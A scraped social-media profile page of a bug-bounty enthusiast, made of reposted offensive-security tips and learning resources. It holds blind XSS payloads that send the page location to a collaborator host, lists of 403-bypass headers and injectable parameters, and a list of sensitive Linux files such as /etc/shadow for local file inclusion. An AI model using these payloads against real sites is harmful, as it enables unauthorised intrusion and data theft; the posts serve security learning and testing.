@vabz10110 Profile picture

vaibhav

@vabz10110

Joined June 2021
vaibhav Reposted

If you like bounties, I highly recommend this presentation from @tincho_508 on novel web cache deception techniques. It comes with @WebSecAcademy labs too! youtube.com/watch?v=70yyOM…


vaibhav Reposted

💁 Steps to find more subdomains #bugbounty #bugbountytips #bugbountytip #cybersecurity

Tweet Image 1
Tweet Image 2
Tweet Image 3
Tweet Image 4

vaibhav Reposted

Here's how you can quickly escalate your SQL injections to RCE on different databases! 🤑 A small thread! 🧵 👇


vaibhav Reposted

Best oneliner for Finding mass xss vulnerability:

Tweet Image 1

vaibhav Reposted

Reversing: Secrets of Reverse Engineering Reverse Engineering Tools With Their Usage: github.com/mohitmishra786… You can see the chapter breakdown below:

Tweet Image 1
Tweet Image 2

vaibhav Reposted

🚀 403 Bypass - bypass by header names Base-Url Client-IP Http-Url Proxy-Host Proxy-Url Real-Ip Redirect Referer Referrer Refferer Request-Uri Uri Url X-Client-IP X-Custom-IP-Authorization X-Forward-For X-Forwarded-By X-Forwarded-For-Original X-Forwarded-For X-Forwarded-Host…


vaibhav Reposted

📲 Blind XSS Payloads '"><img src="example.burpcollaborator.net/image"> '"><img src="example.burpcollaborator.net/image-only" onerror='this.src="example.burpcollaborator.net/image-xss">example.burpcollaborator.net/image-xss?"+btoa(document.location)'> '"><img src=x onerror='this.src="example.burpcollaborator.net/image-xss">example.burpcollaborator.net/image-xss?"+btoa(document.location)'> '"><img src=x…


vaibhav Reposted

🚀 Here are the top 25 parameters that could be vulnerable to code injection and similar RCE vulnerabilities (from link): ?cmd={payload} ?exec={payload} ?command={payload} ?execute{payload} ?ping={payload} ?query={payload} ?jump={payload} ?code={payload} ?reg={payload}…


vaibhav Reposted

🚀 uro Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that. github.com/s0md3v/uro #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting

Tweet Image 1

vaibhav Reposted

🚀 LFI - Interesting Linux files /etc/issue /etc/passwd /etc/shadow /etc/group /etc/hosts /etc/motd /etc/mysql/my.cnf /proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor) /proc/self/environ /proc/version /proc/cmdline /proc/sched_debug /proc/mounts…


vaibhav Reposted

Reverse Engineering 101: Introduction to Reverse Engineering I got many messages about having any course specifically on reverse engineering for beginners. You can find the link in the below comment. This course is very well for that.

Tweet Image 1

vaibhav Reposted

Operating System Development from Scratch: Step-by-Step Guide for the Absolute Beginner For anyone getting into Operating System Development. I tried to develop a roadmap and the resources needed to start it. GitHub Link: github.com/mohitmishra786… This roadmap can be followed by…

Tweet Image 1

vaibhav Reposted

Resources on Satellite hacking CTFs Satellite Hacking Demystified: redteamrecipe.com/satellite-hack… Hack-a-sat writeups: github.com/solar-wine/wri… Hack-a-sat players corner: hackasat.com/players-corner/ #cybersecurity #ctf

Tweet Image 1

vaibhav Reposted

Active Directory Attacks🥷 Complete Guide📑 Download now! drive.google.com/file/d/1NbLPfU…

Tweet Image 1

vaibhav Reposted

Intro for beginners to embedded devices reverse engineering Ghidra setup: voidstarsec.com/blog/ghidra-de… Tools: voidstarsec.com/blog/intro-to-… Firmware extraction: voidstarsec.com/blog/uart-uboo… Credits @voidstarsec #reverseengineering #infosec

Tweet Image 1

United States Trends
Loading...

Something went wrong.


Something went wrong.